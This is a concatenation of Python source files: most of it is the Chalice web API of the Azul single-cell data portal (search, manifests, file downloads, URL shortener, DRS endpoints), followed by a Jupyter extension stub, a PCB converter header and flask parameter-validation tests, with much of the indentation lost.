>>> validate_params({'size': 'foo'}, size=int)
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: Invalid value for `size`
>>> validate_params({'order': 'asc', 'foo': 'bar'}, order=str)
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: Unknown query parameter `foo`
>>> validate_params({'order': 'asc', 'foo': 'bar'}, order=str, allow_extra_params=True)
>>> validate_params({}, foo=str)
>>> validate_params({}, foo=Mandatory(str))
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: Missing required query parameter `foo`
"""
def fmt_error(err_description, params):
# Sorting is to produce a deterministic error message
joined = ', '.join(f'`{p}`' for p in sorted(params))
return f'{err_description} {pluralize("query parameter", len(params))} {joined}'
provided_params = query_params.keys()
validation_params = validators.keys()
mandatory_params = {p for p, v in validators.items() if isinstance(v, Mandatory)}
if not allow_extra_params:
extra_params = provided_params - validation_params
if extra_params:
raise BadRequestError(msg=fmt_error('Unknown', extra_params))
if mandatory_params:
missing_params = mandatory_params - provided_params
if missing_params:
raise BadRequestError(msg=fmt_error('Missing required', missing_params))
for param_name, param_value in query_params.items():
try:
validator = validators[param_name]
except KeyError:
pass
else:
try:
validator(param_value)
except (TypeError, ValueError, RequirementError):
raise BadRequestError(msg=f'Invalid value for `{param_name}`')
@app.route('/integrations', methods=['GET'], cors=True)
def get_integrations():
query_params = app.current_request.query_params or {}
validate_params(query_params,
entity_type=Mandatory(str),
integration_type=Mandatory(str),
entity_ids=str)
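    # Illustrative examples of the three cases handled below:
    #   parameter omitted       -> entity_ids is None (no filtering on entity id)
    #   ?entity_ids=            -> entity_ids == set() (filter for a missing entity_id field)
    #   ?entity_ids=id1, id2    -> entity_ids == {'id1', 'id2'}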
try:
entity_ids = query_params['entity_ids']
except KeyError:
# Case where parameter is absent (do not filter using entity_id field)
entity_ids = None
else:
if entity_ids:
# Case where parameter is present and non-empty (filter for matching id value)
entity_ids = {entity_id.strip() for entity_id in entity_ids.split(',')}
else:
# Case where parameter is present but empty (filter for missing entity_id field,
# i.e., there are no acceptable id values)
entity_ids = set()
entity_type = query_params['entity_type']
integration_type = query_params['integration_type']
portal_service = PortalService()
body = portal_service.list_integrations(entity_type, integration_type, entity_ids)
return Response(status_code=200,
headers={"content-type": "application/json"},
body=json.dumps(body))
@app.route(
'/index/catalogs',
methods=['GET'],
cors=True,
method_spec={
'summary': 'List all available catalogs',
'tags': ['Index'],
'responses': {
'200': {
'description': format_description('''
The name of the default catalog and a list of all available
catalogs. For each catalog, the response includes the name
of the atlas the catalog belongs to, a flag indicating
whether the catalog is for internal use only as well as the
names and types of plugins currently active for the catalog.
For some plugins, the response includes additional
configuration properties, such as the source used by the
repository plugin to populate the catalog.
'''),
**responses.json_content(
# The custom return type annotation is an experiment. Please
# don't adopt this just yet elsewhere in the program.
signature(app.catalog_controller.list_catalogs).return_annotation
)
}
}
}
)
def list_catalogs():
return app.catalog_controller.list_catalogs()
def repository_search(entity_type: str,
item_id: Optional[str],
) -> JSON:
request = app.current_request
query_params = request.query_params or {}
validate_repository_search(query_params)
return app.repository_controller.search(catalog=app.catalog,
entity_type=entity_type,
file_url_func=app.file_url,
item_id=item_id,
filters=query_params.get('filters'),
pagination=app.get_pagination(entity_type),
authentication=request.authentication)
generic_object_spec = schema.object(additional_properties=True)
array_of_object_spec = schema.array(generic_object_spec)
hit_spec = schema.object(
additional_properties=True,
protocols=array_of_object_spec,
entryId=str,
sources=array_of_object_spec,
samples=array_of_object_spec,
specimens=array_of_object_spec,
cellLines=array_of_object_spec,
donorOrganisms=array_of_object_spec,
organoids=schema.array(str),
cellSuspensions=array_of_object_spec,
)
page_spec = schema.object(
hits=schema.array(hit_spec),
pagination=generic_object_spec,
termFacets=generic_object_spec
)
filters_param_spec = params.query(
'filters',
schema.optional(application_json(schema.object_type(
default='{}',
example={'cellCount': {'within': [[10000, 1000000000]]}},
properties={
facet: {
'oneOf': [
schema.object(is_=schema.array({})),
*(
schema.object_type({
op: schema.array({}, minItems=2, maxItems=2)
})
for op in ['contains', 'within', 'intersects']
)
]
}
for facet in app.facets
}
))),
# FIXME: Spec for `filters` argument should be driven by field types
# https://github.com/DataBiosphere/azul/issues/2254
description=format_description('''
Criteria to filter entities from the search results.
Each filter consists of a facet name, a relational operator, and an
array of facet values. The available operators are "is", "within",
"contains", and "intersects". Multiple filters are combined using "and"
logic. An entity must match all filters to be included in the response.
How multiple facet values within a single filter are combined depends
on the operator.
For the "is" operator, multiple values are combined using "or"
logic. For example, `{"fileFormat": {"is": ["fastq", "fastq.gz"]}}`
selects entities where the file format is either "fastq" or
"fastq.gz". For the "within", "intersects", and "contains"
operators, the facet values must come in nested pairs specifying
upper and lower bounds, and multiple pairs are combined using "and"
logic. For example, `{"donorCount": {"within": [[1,5], [5,10]]}}`
selects entities whose donor organism count falls within both
ranges, i.e., is exactly 5.
The organismAge facet is special in that it contains two property keys:
value and unit. For example, `{"organismAge": {"is": [{"value": "20",
"unit": "year"}]}}`. Both keys are required. `{"organismAge": {"is":
[null]}}` selects entities that have no organism age.''' + f'''
Supported facet names are: {', '.join(app.facets)}
''')
)
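# Illustrative sketch, not used by the service: how a client might build the
# `filters` query parameter documented above. The facet names are examples only.
def _example_filters_query_string() -> str:
    import json
    import urllib.parse
    filters = {
        # 'is' combines its values with "or" logic
        'fileFormat': {'is': ['fastq', 'fastq.gz']},
        # range operators take pairs of lower and upper bounds
        'cellCount': {'within': [[10000, 1000000000]]}
    }
    # The parameter value is the JSON serialization of the dictionary,
    # URL-encoded into the query string.
    return urllib.parse.urlencode({'filters': json.dumps(filters)})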
catalog_param_spec = params.query(
'catalog',
schema.optional(schema.with_default(app.catalog,
type_=schema.enum(*config.catalogs))),
description='The name of the catalog to query.')
def repository_search_params_spec(index_name):
sort_default, order_default = sort_defaults[index_name]
return [
catalog_param_spec,
filters_param_spec,
params.query(
'size',
schema.optional(schema.with_default(10, type_=schema.in_range(min_page_size, max_page_size))),
description='The number of hits included per page.'),
params.query(
'sort',
schema.optional(schema.with_default(sort_default, type_=schema.enum(*app.facets))),
description='The facet to sort the hits by.'),
params.query(
'order',
schema.optional(schema.with_default(order_default, type_=schema.enum('asc', 'desc'))),
description=format_description('''
The ordering of the sorted hits, either ascending
or descending.
''')
),
*[
params.query(
param,
schema.optional(str),
description=format_description('''
Use the `next` and `previous` properties of the
`pagination` response element to navigate between pages.
'''),
deprecated=True)
for param in [
'search_before',
'search_before_uid',
'search_after',
'search_after_uid'
]
]
]
def repository_search_spec(index_name):
id_spec_link = f'#operations-Index-get_index_{index_name}__{index_name.rstrip("s")}_id_'
return {
'summary': f'Search the {index_name} index for entities of interest.',
'tags': ['Index'],
'parameters': repository_search_params_spec(index_name),
'responses': {
'200': {
'description': format_description(f'''
Paginated list of {index_name} that meet the search
criteria ("hits"). The structure of these hits is documented
under the [corresponding endpoint for a specific entity]({id_spec_link}).
The `pagination` section describes the total number of hits
and total number of pages, as well as user-supplied search
parameters for page size and sorting behavior. It also
provides links for navigating forwards and backwards between
pages of results.
The `termFacets` section tabulates the occurrence of unique
values within nested fields of the `hits` section across all
entities meeting the filter criteria (this includes entities
not listed on the current page, meaning that this section
will be invariable across all pages from the same search).
Not every nested field is tabulated, but the set of
tabulated fields is consistent between entity types.
'''),
**responses.json_content(page_spec)
}
}
}
def repository_id_spec(index_name_singular: str):
search_spec_link = f'#operations-Index-get_index_{index_name_singular}s'
return {
'summary': f'Detailed information on a particular {index_name_singular} entity.',
'tags': ['Index'],
'parameters': [
catalog_param_spec,
params.path(f'{index_name_singular}_id', str, description=f'The UUID of the desired {index_name_singular}')
],
'responses': {
'200': {
'description': format_description(f'''
This response describes a single {index_name_singular} entity. To
search the index for multiple entities, see the
[corresponding search endpoint]({search_spec_link}).
The properties that are common to all entity types are
listed in the schema below; however, additional properties
may be present for certain entity types. With the exception
of the {index_name_singular}'s unique identifier, all
properties are arrays, even in cases where only one value is
present.
The structures of the objects within these arrays are not
perfectly consistent, since they may represent either
singleton entities or aggregations depending on context.
For example, any biomaterial that yields a cell suspension
which yields a sequence file will be considered a "sample".
Therefore, the `samples` field is polymorphic, and each
sample may be either a specimen, an organoid, or a cell
line (the field `sampleEntityType` can be used to
discriminate between these cases).
'''),
**responses.json_content(hit_spec)
}
}
}
def repository_head_spec(index_name):
search_spec_link = f'#operations-Index-get_index_{index_name}'
return {
'summary': 'Perform a query without returning its result.',
'tags': ['Index'],
'responses': {
'200': {
'description': format_description(f'''
The HEAD method can be used to test whether the
{index_name} index is operational, or to check the validity
of query parameters for the
[GET method]({search_spec_link}).
''')
}
}
}
def repository_head_search_spec(index_name):
return {
**repository_head_spec(index_name),
'parameters': repository_search_params_spec(index_name)
}
repository_summary_spec = {
'tags': ['Index'],
'parameters': [catalog_param_spec, filters_param_spec]
}
@app.route('/index/files', methods=['GET'], method_spec=repository_search_spec('files'), cors=True)
@app.route('/index/files', methods=['HEAD'], method_spec=repository_head_search_spec('files'), cors=True)
@app.route('/index/files/{file_id}', methods=['GET'], method_spec=repository_id_spec('file'), cors=True)
def get_data(file_id: Optional[str] = None) -> JSON:
return repository_search('files', file_id)
@app.route('/index/samples', methods=['GET'], method_spec=repository_search_spec('samples'), cors=True)
@app.route('/index/samples', methods=['HEAD'], method_spec=repository_head_search_spec('samples'), cors=True)
@app.route('/index/samples/{sample_id}', methods=['GET'], method_spec=repository_id_spec('sample'), cors=True)
def get_sample_data(sample_id: Optional[str] = None) -> JSON:
return repository_search('samples', sample_id)
@app.route('/index/bundles', methods=['GET'], method_spec=repository_search_spec('bundles'), cors=True)
@app.route('/index/bundles', methods=['HEAD'], method_spec=repository_head_search_spec('bundles'), cors=True)
@app.route('/index/bundles/{bundle_id}', methods=['GET'], method_spec=repository_id_spec('bundle'), cors=True)
def get_bundle_data(bundle_id: Optional[str] = None) -> JSON:
return repository_search('bundles', bundle_id)
@app.route('/index/projects', methods=['GET'], method_spec=repository_search_spec('projects'), cors=True)
@app.route('/index/projects', methods=['HEAD'], method_spec=repository_head_search_spec('projects'), cors=True)
@app.route('/index/projects/{project_id}', methods=['GET'], method_spec=repository_id_spec('project'), cors=True)
def get_project_data(project_id: Optional[str] = None) -> JSON:
return repository_search('projects', project_id)
@app.route('/index/summary', methods=['GET'], method_spec={
'summary': 'Statistics on the data present across all entities.',
'responses': {
'200': {
'description': format_description('''
Counts the total number and total size in bytes of assorted
entities, subject to the provided filters.
`fileTypeSummaries` provides the count and total size in bytes
of files grouped by their format, e.g. "fastq" or "matrix."
`fileCount` and `totalFileSize` compile these figures across all
file formats. Likewise, `cellCountSummaries` counts cells and
their associated documents grouped by organ type, with
`totalCellCount` compiling cell counts across organ types and
`organTypes` listing all referenced organs.
Total counts of unique entities are also provided for other
entity types such as projects and tissue donors. These values
are not grouped/aggregated.
'''),
**responses.json_content(
schema.object(
additional_properties=True,
organTypes=schema.array(str),
totalFileSize=float,
fileTypeSummaries=array_of_object_spec,
totalCellCount=float,
cellCountSummaries=array_of_object_spec,
projectEstimatedCellCount=float,
donorCount=int,
fileCount=int,
labCount=int,
projectCount=int,
speciesCount=int,
specimenCount=int,
)
)
}
},
**repository_summary_spec
}, cors=True)
@app.route('/index/summary', methods=['HEAD'], method_spec={
**repository_head_spec('summary'),
**repository_summary_spec
})
def get_summary():
"""
    Returns a summary based on the filters passed to the call, modeled after the
    ICGC summary endpoint.
    :return: A jsonified summary API response
"""
request = app.current_request
query_params = request.query_params or {}
validate_params(query_params,
filters=str,
catalog=config.Catalog.validate_name)
filters = query_params.get('filters', '{}')
validate_filters(filters)
return app.repository_controller.summary(catalog=app.catalog,
filters=filters,
authentication=request.authentication)
@app.route('/index/files/order', methods=['GET'], cors=True, method_spec={
'parameters': [
catalog_param_spec
],
'deprecated': True,
'responses': {'200': {'description': 'OK'}},
'tags': ['Index']
})
def get_order():
"""
Return the ordering on facets
"""
return {'order': app.service_config.order_config}
token_param_spec = params.query('token',
schema.optional(str),
description='Reserved. Do not pass explicitly.')
def manifest_path_spec(*, fetch: bool):
return {
'parameters': [
catalog_param_spec,
filters_param_spec,
params.query(
'format',
schema.optional(
schema.enum(
*[
format_.value for format_ in ManifestFormat
],
type_=str
)
),
description=f'''
The desired format of the output.
- `{ManifestFormat.compact.value}` (the default) for a compact, tab-separated
manifest
- `{ManifestFormat.terra_bdbag.value}` for a manifest in the
[BDBag format][1]. This provides a ZIP file containing two manifests: one for
Participants (aka Donors) and one for Samples (aka Specimens). For more on the
format of the manifests see [documentation here][2].
- `{ManifestFormat.terra_pfb.value}` for a manifest in the [PFB format][3]. This
format is mainly used for exporting data to Terra.
- `{ManifestFormat.curl.value}` for a [curl configuration file][4] manifest.
This manifest can be used with the curl program to download all the files listed
in the manifest.
[1]: http://bd2k.ini.usc.edu/tools/bdbag/
[2]: https://software.broadinstitute.org/firecloud/documentation/article?id=10954
[3]: https://github.com/uc-cdis/pypfb
[4]: https://curl.haxx.se/docs/manpage.html#-K
''',
),
*(
[] if fetch else [
params.query('objectKey',
schema.optional(str),
description='Reserved. Do not pass explicitly.')
]
),
token_param_spec
],
}
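# Note (illustrative): a manifest in the `curl` format is intended to be passed to
# curl's `--config` (`-K`) option, e.g. `curl --config manifest.curl`, which then
# downloads every file listed in the manifest.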
@app.route('/manifest/files', methods=['GET'], cors=True, path_spec=manifest_path_spec(fetch=False), method_spec={
'tags': ['Manifests'],
'summary': 'Request a download link to a manifest file and redirect',
'description': format_description('''
Initiate and check status of a manifest generation job, returning
either a 301 response redirecting to a URL to re-check the status of
the manifest generation or a 302 response redirecting to the location
of the completed manifest.
'''),
'responses': {
'301': {
'description': format_description('''
The manifest generation has been started or is ongoing.
The response is a redirect back to this endpoint, so the client
should expect a subsequent response of the same kind.
'''),
'headers': {
'Location': {
'description': 'URL to recheck the status of the '
'manifest generation.',
'schema': {'type': 'string', 'format': 'url'},
},
'Retry-After': {
'description': 'Recommended number of seconds to wait '
'before requesting the URL specified in '
'the Location header.',
'schema': {'type': 'string'},
},
},
},
'302': {
'description': format_description('''
The manifest generation is complete and ready for download.
'''),
'headers': {
'Location': {
'description': 'URL that will yield the actual '
'manifest file.',
'schema': {'type': 'string', 'format': 'url'},
},
'Retry-After': {
'description': 'Recommended number of seconds to wait '
'before requesting the URL specified in '
'the Location header.',
'schema': {'type': 'string'},
},
},
},
'410': {
'description': format_description('''
The manifest associated with the `objectKey` in this request has
expired. Request a new manifest.
''')
}
},
})
def file_manifest():
return _file_manifest(fetch=False)
keys = CurlManifestGenerator.command_lines(url='', file_name='').keys()
command_line_spec = schema.object(**{key: str for key in keys})
@app.route('/fetch/manifest/files', methods=['GET'], cors=True, path_spec=manifest_path_spec(fetch=True), method_spec={
'tags': ['Manifests'],
'summary': 'Request a download link to a manifest file and check status',
'description': format_description('''
Initiate a manifest generation or check the status of an already ongoing
generation, returning a 200 response with simulated HTTP headers in the
body.
'''),
'responses': {
'200': {
**responses.json_content(
schema.object(
Status=int,
Location={'type': 'string', 'format': 'url'},
**{'Retry-After': schema.optional(int)},
CommandLine=command_line_spec
)
),
'description': format_description('''
Manifest generation with status report, emulating the response
code and headers of the `/manifest/files` endpoint. Note that
the actual HTTP response will have status 200 while the `Status`
field of the body will be 301 or 302. The intent is to emulate
HTTP while bypassing the default client behavior, which (in most
web browsers) is to ignore `Retry-After`. The response described
here is intended to be processed by client-side Javascript such
that the recommended delay in `Retry-After` can be handled in
Javascript rather than relying on the native implementation by
the web browser.
For a detailed description of the fields in the response see
the documentation for the headers they emulate in the
[`/manifest/files`](#operations-Manifests-get_manifest_files)
endpoint response.
'''),
},
},
})
def fetch_file_manifest():
return _file_manifest(fetch=True)
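# Illustrative sketch, not part of the service: a client-side polling loop for the
# /fetch/manifest/files endpoint described above. It reads the emulated `Status`,
# `Location` and `Retry-After` fields from the JSON body rather than from real HTTP
# headers. The base URL is an assumption and `requests` is assumed to be available.
def _example_fetch_manifest(base_url: str, filters: str = '{}') -> str:
    """Return the URL of the completed manifest."""
    import time
    import requests
    url, params = f'{base_url}/fetch/manifest/files', {'filters': filters}
    while True:
        body = requests.get(url, params=params).json()
        if body['Status'] == 302:
            return body['Location']
        assert body['Status'] == 301, body
        time.sleep(body.get('Retry-After', 1))
        # Subsequent requests go to the URL given in the body, which already
        # carries the token query parameter.
        url, params = body['Location'], None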
def _file_manifest(fetch: bool):
query_params = app.current_request.query_params or {}
query_params.setdefault('filters', '{}')
query_params.setdefault('format', ManifestFormat.compact.value)
# FIXME: Remove `object_key` when Swagger validation lands
# https://github.com/DataBiosphere/azul/issues/1465
# The objectKey query parameter is not allowed in /fetch/manifest/files
object_key = {} if fetch else {'objectKey': str}
validate_params(query_params,
format=ManifestFormat,
catalog=config.Catalog.validate_name,
filters=str,
token=str,
**object_key)
validate_filters(query_params['filters'])
return app.manifest_controller.get_manifest_async(self_url=app.self_url(),
catalog=app.catalog,
query_params=query_params,
fetch=fetch)
@app.lambda_function(name='manifest')
def generate_manifest(event: AnyJSON, context: LambdaContext):
assert isinstance(event, Mapping)
assert all(isinstance(k, str) for k in event.keys())
return app.manifest_controller.get_manifest(event)
file_fqid_parameters_spec = [
params.path(
'file_uuid',
str,
description='The UUID of the file to be returned.'),
params.query(
'version',
schema.optional(str),
description=format_description('''
The version of the file to be returned. File versions are opaque
strings with only one documented property: they can be
lexicographically compared with each other in order to determine
which version is more recent. If this parameter is omitted then the
most recent version of the file is returned.
''')
)
]
repository_files_spec = {
'tags': ['Repository'],
'parameters': [
catalog_param_spec,
*file_fqid_parameters_spec,
params.query(
'fileName',
schema.optional(str),
description=format_description('''
The desired name of the file. The given value will be included
in the Content-Disposition header of the response. If absent, a
best effort to determine the file name from metadata will be
made. If that fails, the UUID of the file will be used instead.
''')
),
params.query(
'wait',
schema.optional(int),
description=format_description('''
If 0, the client is responsible for honoring the waiting
period specified in the Retry-After response header. If 1, the
server will delay the response in order to consume as much of
that waiting period as possible. This parameter should only be
set to 1 by clients who can't honor the `Retry-After` header,
preventing them from quickly exhausting the maximum number of
redirects. If the server cannot wait the full amount, any
amount of wait time left will still be returned in the
Retry-After header of the response.
''')
),
params.query(
'replica',
schema.optional(str),
description=format_description('''
If the underlying repository offers multiple replicas of the
requested file, use the specified replica. Otherwise, this
parameter is ignored. If absent, the only replica — for
repositories that don't support replication — or the default
replica — for those that do — will be used.
'''),
),
params.query(
'requestIndex',
schema.optional(int),
description='Do not use. Reserved for internal purposes.'
),
params.query(
'drsPath',
schema.optional(str),
description='Do not use. Reserved for internal purposes.'
),
token_param_spec
]
}
@app.route('/repository/files/{file_uuid}', methods=['GET'], cors=True, method_spec={
**repository_files_spec,
'summary': 'Redirect to a URL for downloading a given data file from the '
'underlying repository',
'responses': {
'301': {
'description': format_description('''
A URL to the given file is still being prepared. Retry by
waiting the number of seconds specified in the `Retry-After`
header of the response and the requesting the URL specified in
the `Location` header.
'''),
'headers': {
'Location': responses.header(str, description=format_description('''
A URL pointing back at this endpoint, potentially with
different or additional request parameters.
''')),
'Retry-After': responses.header(int, description=format_description('''
Recommended number of seconds to wait before requesting the
URL specified in the `Location` header. The response may
carry this header even if server-side waiting was requested
via `wait=1`.
'''))
}
},
'302': {
'description': format_description('''
The file can be downloaded from the URL returned in the
`Location` header.
'''),
'headers': {
'Location': responses.header(str, description=format_description('''
A URL that will yield the actual content of the file.
''')),
'Content-Disposition': responses.header(str, description=format_description('''
Set to a value that makes user agents download the file
instead of rendering it, suggesting a meaningful name
for the downloaded file stored on the user's file
system. The suggested file name is taken from the
`fileName` request parameter or, if absent, from
metadata describing the file. It generally does not
correlate with the path component of the URL returned
in the `Location` header.
'''))
}
},
}
})
def repository_files(file_uuid: str) -> Response:
result = _repository_files(file_uuid, fetch=False)
status_code = result.pop('Status')
return Response(body='',
headers={k: str(v) for k, v in result.items()},
status_code=status_code)
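# Illustrative sketch, not part of the service: how a client that cannot rely on its
# HTTP library to honor `Retry-After` might drive the endpoint above. The base URL
# is an assumption and `requests` is assumed to be available; error handling is
# omitted for brevity.
def _example_download_file(base_url: str, file_uuid: str) -> str:
    """Follow the 301 retry loop until a 302 response yields the final download URL."""
    import time
    import requests
    url = f'{base_url}/repository/files/{file_uuid}'
    while True:
        response = requests.get(url, allow_redirects=False)
        if response.status_code == 302:
            return response.headers['Location']
        elif response.status_code == 301:
            time.sleep(int(response.headers.get('Retry-After', '1')))
            url = response.headers['Location']
        else:
            response.raise_for_status()
            raise RuntimeError(f'Unexpected status {response.status_code}')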
@app.route('/fetch/repository/files/{file_uuid}', methods=['GET'], cors=True, method_spec={
**repository_files_spec,
'summary': 'Request a URL for downloading a given data file',
'responses': {
'200': {
'description': format_description(f'''
Emulates the response code and headers of {one(repository_files.path)}
while bypassing the default user agent behavior. Note that the
status code of a successful response will be 200 while the
`Status` field of its body will be 302.
The response described here is intended to be processed by
client-side Javascript such that the emulated headers can
be handled in Javascript rather than relying on the native
implementation by the web browser.
'''),
**responses.json_content(
schema.object(
Status=int,
Location=str,
)
)
}
}
})
def fetch_repository_files(file_uuid: str) -> Response:
body = _repository_files(file_uuid, fetch=True)
return Response(body=json.dumps(body), status_code=200)
def _repository_files(file_uuid: str, fetch: bool) -> MutableJSON:
request = app.current_request
query_params = request.query_params or {}
headers = request.headers
def validate_replica(replica: str) -> None:
if replica not in ('aws', 'gcp'):
raise ValueError
def validate_wait(wait: Optional[str]) -> Optional[int]:
if wait is None:
return None
elif wait == '0':
return False
elif wait == '1':
return True
else:
raise ValueError
validate_params(query_params,
catalog=str,
version=str,
fileName=str,
wait=validate_wait,
requestIndex=int,
replica=validate_replica,
drsPath=str,
token=str)
# FIXME: Prevent duplicate filenames from files in different subgraphs by
# prepending the subgraph UUID to each filename when downloaded
# https://github.com/DataBiosphere/azul/issues/2682
catalog = app.catalog
return app.repository_controller.download_file(catalog=catalog,
fetch=fetch,
file_uuid=file_uuid,
query_params=query_params,
headers=headers,
authentication=request.authentication)
@app.route('/repository/sources', methods=['GET'], cors=True, method_spec={
'summary': 'List available data sources',
'tags': ['Repository'],
'parameters': [catalog_param_spec],
'responses': {
'200': {
'description': format_description('''
List the sources the currently authenticated user is authorized
to access in the underlying data repository.
'''),
**responses.json_content(
schema.object(sources=schema.array(
schema.object(
sourceId=str,
sourceSpec=str,
)
))
)
},
}
})
def list_sources() -> Response:
validate_params(app.current_request.query_params or {},
catalog=validate_catalog)
sources = app.repository_controller.list_sources(app.catalog,
app.current_request.authentication)
return Response(body={'sources': sources}, status_code=200)
@app.route('/url', methods=['POST'], cors=True)
def shorten_query_url():
"""
    Take a URL as input and return a (potentially) shortened URL that will
    redirect to the given URL.
parameters:
- name: url
in: body
type: string
description: URL to shorten
:return: A 200 response with JSON body containing the shortened URL:
```
{
"url": "http://url.singlecell.gi.ucsc.edu/b3N"
}
```
A 400 error is returned if an invalid URL is given. This could be a URL that is not whitelisted
or a string that is not a valid web URL.
"""
try:
url = app.current_request.json_body['url']
except KeyError:
raise BadRequestError('`url` must be given in the request body')
url_hostname = urllib.parse.urlparse(url).netloc
    if not any(re.fullmatch(whitelisted_url, url_hostname)
               for whitelisted_url in config.url_shortener_whitelist):
raise BadRequestError('Invalid URL given')
url_hash = hash_url(url)
storage_service = StorageService(config.url_redirect_full_domain_name)
def get_url_response(path):
return {'url': f'http://{config.url_redirect_full_domain_name}/{path}'}
key_length = 3
while key_length <= len(url_hash):
key = url_hash[:key_length]
try:
existing_url = storage_service.get(key).decode(encoding='utf-8')
except storage_service.client.exceptions.NoSuchKey:
try:
storage_service.put(key,
data=bytes(url, encoding='utf-8'),
ACL='public-read',
WebsiteRedirectLocation=url)
except ClientError as e:
if e.response['Error']['Code'] == 'InvalidRedirectLocation':
raise BadRequestError('Invalid URL given')
else:
raise
return get_url_response(key)
if existing_url == url:
return get_url_response(key)
key_length += 1
raise ChaliceViewError('Could not create shortened URL')
def hash_url(url):
url_hash = hashlib.sha1(bytes(url, encoding='utf-8')).digest()
return base64.urlsafe_b64encode(url_hash).decode()
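# Note (illustrative): a SHA-1 digest is 20 bytes, so hash_url returns a
# 28-character URL-safe base64 string (including padding); the loop in
# shorten_query_url can therefore grow the key from 3 characters up to the full
# hash before giving up.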
drs_spec_description = format_description('''
This is a partial implementation of the
[DRS 1.0.0 spec](https://ga4gh.github.io/data-repository-service-schemas/preview/release/drs-1.0.0/docs/).
Not all features are implemented. This endpoint acts as a DRS-compliant
proxy for accessing files in the underlying repository.
Any errors encountered from the underlying repository are forwarded on as
errors from this endpoint.
''')
@app.route(
drs.drs_object_url_path('{file_uuid}'),
methods=['GET'],
enabled=config.is_dss_enabled(),
cors=True,
method_spec={
'summary': 'Get file DRS object',
'tags': ['DRS'],
'description': format_description('''
This endpoint returns object metadata, and a list of access methods that can
be used to fetch object bytes.
''') + drs_spec_description,
'parameters': file_fqid_parameters_spec,
'responses': {
'200': {
'description': format_description('''
A DRS object is returned. Two
[`AccessMethod`s](https://ga4gh.github.io/data-repository-service-schemas/preview/release/drs-1.1.0/docs/#_accessmethod)
are included:
{access_methods}
If the object is not immediately ready, an `access_id` will be
returned instead of an `access_url`.
''', access_methods='\n'.join(f'- {am!s}' for am in AccessMethod)),
**app.drs_controller.get_object_response_schema()
}
},
}
)
def get_data_object(file_uuid):
"""
Return a DRS data object dictionary for a given DSS file UUID and version.
If the file is already checked out, we can return a drs_object with a URL
immediately. Otherwise, we need to send the request through the /access
endpoint.
"""
query_params = app.current_request.query_params or {}
validate_params(query_params, version=str)
return app.drs_controller.get_object(file_uuid, query_params)
@app.route(
drs.drs_object_url_path('{file_uuid}', access_id='{access_id}'),
methods=['GET'],
enabled=config.is_dss_enabled(),
cors=True,
method_spec={
'summary': 'Get a file with an access ID',
'description': format_description('''
This endpoint returns a URL that can be used to fetch the bytes of a DRS
object.
This method only needs to be called when using an `AccessMethod` that
contains an `access_id`.
An `access_id` is returned when the underlying file is not ready. When
            the underlying repository is the DSS, the 202 response allows time for
the DSS to do a checkout.
''') + drs_spec_description,
'parameters': [
*file_fqid_parameters_spec,
params.path('access_id', str, description='Access ID returned from a previous request')
],
'responses': {
'202': {
'description': format_description('''
This response is issued if the object is not yet ready. Respect
the `Retry-After` header, then try again.
'''),
'headers': {
'Retry-After': responses.header(str, description=format_description('''
Recommended number of seconds to wait before requesting the
URL specified in the Location header.
'''))
}
},
'200': {
'description': format_description('''
The object is ready. The URL is in the response object.
'''),
**responses.json_content(schema.object(url=str))
}
},
'tags': ['DRS']
}
)
def get_data_object_access(file_uuid, access_id):
query_params = app.current_request.query_params or {}
validate_params(query_params, version=str)
return app.drs_controller.get_object_access(access_id, file_uuid, query_params)
@app.route(
drs.dos_object_url_path('{file_uuid}'),
methods=['GET'],
enabled=config.is_dss_enabled(),
cors=True
)
def dos_get_data_object(file_uuid):
"""
Return a DRS data object dictionary for a given DSS file UUID and version.
"""
request = app.current_request
query_params = request.query_params or {}
validate_params(query_params,
version=str,
catalog=config.Catalog.validate_name)
catalog = app.catalog
file_version = query_params.get('version')
return app.drs_controller.dos_get_object(catalog,
file_uuid,
file_version,
request.authentication)
|
from .handlers import TutorialHandler
def _jupyter_server_extension_points():
    """Declare the importable module that provides this Jupyter Server extension."""
    return [{
        "module": "mybutton"
    }]
def load_jupyter_server_extension(server_app):
    """Register the extension's request handlers with the running Jupyter Server."""
    handlers = [("/mybutton/hello", TutorialHandler)]
    server_app.web_app.add_handlers(".*$", handlers)
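# Note: loading the extension also requires it to be enabled. With jupyter_server
# this is typically done via configuration, for example (trait name assumed here):
#
#   # jupyter_server_config.py
#   c.ServerApp.jpserver_extensions = {"mybutton": True}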
|
# Kaolin PCB Converter Utility
#
# ILAN E. MOYER
# March 30th, 2021
#
# One goal of the Kaolin project is to embed the design for an MCU's PCB within the memory of the MCU itself.
# This script reads in an Autodesk Eagle PCB (.brd) file, converts it into the Kaolin format, and
# saves out an Intel HEX file.
import xml.etree.ElementTree as ET
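# Minimal sketch of the input side, under the assumption that the .brd file follows
# the Eagle XML layout with a <drawing>/<board> tree containing
# <signals>/<signal>/<wire> elements. The Kaolin encoding itself is not shown here;
# this helper only illustrates reading the board geometry with ElementTree.
def _example_read_wires(brd_path):
    """Yield (signal name, x1, y1, x2, y2, width, layer) for each routed wire."""
    board = ET.parse(brd_path).getroot().find('drawing/board')
    for signal in board.findall('signals/signal'):
        for wire in signal.findall('wire'):
            yield (signal.get('name'),
                   float(wire.get('x1')), float(wire.get('y1')),
                   float(wire.get('x2')), float(wire.get('y2')),
                   float(wire.get('width')), int(wire.get('layer')))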
|
from io import BytesIO
import json
from typing import List
import flask
import pytest
def test_parameter_validation(simple_app):
app_client = simple_app.app.test_client()
url = "/v1.0/test_parameter_validation"
response = app_client.get(url, query_string={"date": "2015-08-26"}) # type: flask.Response
assert response.status_code == 200
for invalid_int in "", "foo", "0.1":
response = app_client.get(url, query_string={"int": invalid_int}) # type: flask.Response
assert response.status_code == 400
response = app_client.get(url, query_string={"int": "123"}) # type: flask.Response
assert response.status_code == 200
for invalid_bool in "", "foo", "yes":
response = app_client.get(url, query_string={"bool": invalid_bool}) # type: flask.Response
assert response.status_code == 400
response = app_client.get(url, query_string={"bool": "true"}) # type: flask.Response
assert response.status_code == 200
def test_required_query_param(simple_app):
app_client = simple_app.app.test_client()
url = "/v1.0/test_required_query_param"
response = app_client.get(url)
assert response.status_code == 400
response = app_client.get(url, query_string={"n": "1.23"})
assert response.status_code == 200
def test_array_query_param(simple_app):
app_client = simple_app.app.test_client()
headers = {"Content-type": "application/json"}
url = "/v1.0/test_array_csv_query_param"
response = app_client.get(url, headers=headers)
array_response: List[str] = json.loads(response.data.decode("utf-8", "replace"))
assert array_response == ["squash", "banana"]
url = "/v1.0/test_array_csv_query_param?items=one,two,three"
response = app_client.get(url, headers=headers)
